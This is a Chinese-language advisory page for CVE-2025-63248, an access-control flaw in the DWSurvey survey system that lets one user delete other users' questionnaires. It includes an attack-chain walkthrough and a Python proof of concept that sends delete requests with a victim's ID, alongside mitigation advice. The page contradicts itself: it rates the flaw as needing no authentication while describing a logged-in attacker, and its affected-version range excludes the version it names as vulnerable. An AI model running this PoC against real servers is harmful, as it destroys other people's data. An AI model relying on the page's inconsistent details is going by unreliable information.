CVE-2025-63248 CVSS 7.5 高危

CVE-2025-63248 DWSurvey 6.14.0 越权删除问卷漏洞

披露日期: 2025-11-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-63248

漏洞类型

越权访问控制

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DWSurvey

漏洞概述

DWSurvey是一款开源的企业级在线问卷调查系统。该系统在6.14.0版本中存在严重的越权访问控制漏洞。攻击者可以在删除问卷时，通过替换目标问卷ID的方式，绕过正常的权限验证机制，实现对其他用户问卷的非法删除操作。该漏洞属于OWASP Top 10中的A01:2021 - Broken Access Control类别。由于系统在删除问卷时仅验证当前会话状态，而未正确验证被删除资源的所有权归属，导致任何认证用户都可能删除系统中任意问卷。此漏洞可能导致企业重要调查数据的丢失，影响业务连续性，同时可能被恶意利用进行数据破坏或商业机密泄露。

技术细节

漏洞存在于DWSurvey的问卷删除功能模块。当用户发起问卷删除请求时，系统通过会话机制验证用户身份，但未对被删除问卷的所有权进行充分校验。攻击流程如下：首先登录系统并创建或选择一个存在的问卷，获取该问卷的ID。随后发起删除请求时，在HTTP请求中将目标问卷ID替换为其他用户的问卷ID。服务器端仅检查用户是否已登录（PR:N），而未验证当前用户是否有权删除该ID对应的问卷资源。由于系统采用直接ID引用的方式访问资源，攻击者可以通过遍历ID实现批量删除其他用户问卷。漏洞的根本原因在于缺少基于用户身份的访问控制检查（AC_L），使得攻击者可以通过修改请求参数突破权限边界。

攻击链分析

STEP 1

步骤1

攻击者注册并登录DWSurvey系统，获取有效的认证令牌

STEP 2

步骤2

攻击者访问自己的问卷列表，获取任意一个有效问卷的ID作为模板

STEP 3

步骤3

攻击者构造删除请求，将请求参数中的问卷ID替换为目标受害者的问卷ID

STEP 4

步骤4

服务器收到请求后，仅验证用户会话有效性，未检查问卷所有权即执行删除操作

STEP 5

步骤5

受害者问卷被成功删除，攻击者可遍历ID实现批量删除其他用户问卷

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-63248 DWSurvey IDOR Vulnerability PoC
# Target: DWSurvey 6.14.0
# Vulnerability: Incorrect Access Control in questionnaire deletion

TARGET_URL = "http://target-server/dwsurvey"
ATTACKER_TOKEN = "your-auth-token-here"

# Victim questionnaire ID to be deleted
VICTIM_QUESTIONNAIRE_ID = "victim-survey-id"

def delete_questionnaire(questionnaire_id):
    """Send delete request for specific questionnaire ID"""
    endpoint = f"{TARGET_URL}/api/questionnaire/delete"
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "id": questionnaire_id
    }
    response = requests.post(endpoint, json=payload, headers=headers)
    return response.status_code, response.text

# Exploit: Delete victim questionnaire by replacing ID
status, resp = delete_questionnaire(VICTIM_QUESTIONNAIRE_ID)
print(f"Status: {status}")
print(f"Response: {resp}")

影响范围

DWSurvey < 6.14.0

防御指南

临时缓解措施

在等待官方修复期间，可通过配置Web应用防火墙（WAF）规则限制问卷删除接口的访问频率，并对请求参数进行严格校验。同时建议暂时禁用问卷删除功能，或通过中间件层实现业务层面的权限检查，确保删除操作前验证资源所有权。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63248
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63248
3 Details https://www.cvedetails.com/cve/CVE-2025-63248/
4 VulDB https://vuldb.com/cve/CVE-2025-63248
5 Link https://gitee.com/wkeyuan/DWSurvey
6 Link https://github.com/Chen1-Boop/CVE/blob/main/CVE-2025-63248.md

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表